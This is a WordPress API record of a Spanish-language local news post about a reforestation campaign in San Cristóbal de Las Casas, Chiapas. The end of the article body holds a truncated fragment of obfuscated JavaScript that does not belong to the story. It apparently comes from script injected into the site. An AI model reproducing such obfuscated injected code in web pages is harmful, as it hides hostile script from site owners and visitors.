{"id":4596,"date":"2022-08-22T03:27:19","date_gmt":"2022-08-22T03:27:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4596"},"modified":"2022-08-22T03:27:20","modified_gmt":"2022-08-22T03:27:20","slug":"realizan-campana-de-reforestacion-en-san-cristobal-de-las-casas-2","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4596","title":{"rendered":"Realizan campa\u00f1a de reforestaci\u00f3n en San Crist\u00f3bal de Las Casas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"432\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-12.49.20-PM.jpeg\" alt=\"\" class=\"wp-image-4597\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-12.49.20-PM.jpeg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-21-at-12.49.20-PM-300x180.jpeg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Integrantes del Comit\u00e9 de Cuenca del Valle de Jovel se encuentran realizando la XV Campa\u00f1a de Reforestaci\u00f3n, donde este fin de semana estuvieron en el Ejido Carmen Arcotete, dio a conocer el coordinador de dicha campa\u00f1a, Alejandro Ruiz Guzm\u00e1n.<\/p>\n\n\n\n<p>En entrevista, invit\u00f3 a ambientalistas e integrantes de otras organizaciones ambientales a las jornadas de reforestaci\u00f3n que estar\u00e1n haciendo en la Cuenca del Valle de Jovel, donde los interesados en participar deb\u00edan llevar ropa adecuada para campo y alimentos para compartir.<\/p>\n\n\n\n<p>\u201cEl ejido Carmen Arcotete es una comunidad que a\u00f1o con a\u00f1o ha estado participando en esta jornada de reforestaci\u00f3n. Los habitantes de esta comunidad nos proporcionan sus predios, sus terrenos que est\u00e1n arriba de las monta\u00f1as para que se sigan sembrando \u00e1rboles, y este a\u00f1o no es la excepci\u00f3n, ya que trabajaron este domingo\u201d, coment\u00f3.<\/p>\n\n\n\n<p>Asimismo, dijo que se encuentran trabajando con usuarios del Sistema Chupactic, que se ubica en la zona de La Garita, quienes tambi\u00e9n apoyan la campa\u00f1a de reforestaci\u00f3n. Y es que son una organizaci\u00f3n de la sociedad civil que tiene como meta producir un mill\u00f3n de \u00e1rboles cada a\u00f1o para reforestar no solo en la cuenca del Valle de Jovel, sino muchos otros municipios de la regi\u00f3n de Los Altos y fuera de esta regi\u00f3n que solicitan \u00e1rboles.<\/p>\n\n\n\n<p>Zona de los archivos adjuntos<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Integrantes del Comit\u00e9 de Cuenca del Valle de Jovel se encuentran realizando la XV Campa\u00f1a de Reforestaci\u00f3n, donde este fin de semana estuvieron en el Ejido Carmen Arcotete, dio a conocer el coordinador de dicha campa\u00f1a, Alejandro Ruiz Guzm\u00e1n. En entrevista, invit\u00f3 a ambientalistas e integrantes de otras &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4597,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4596","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4596","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4596"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4596\/revisions"}],"predecessor-version":[{"id":4598,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4596\/revisions\/4598"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4597"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4596"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4596"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4596"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}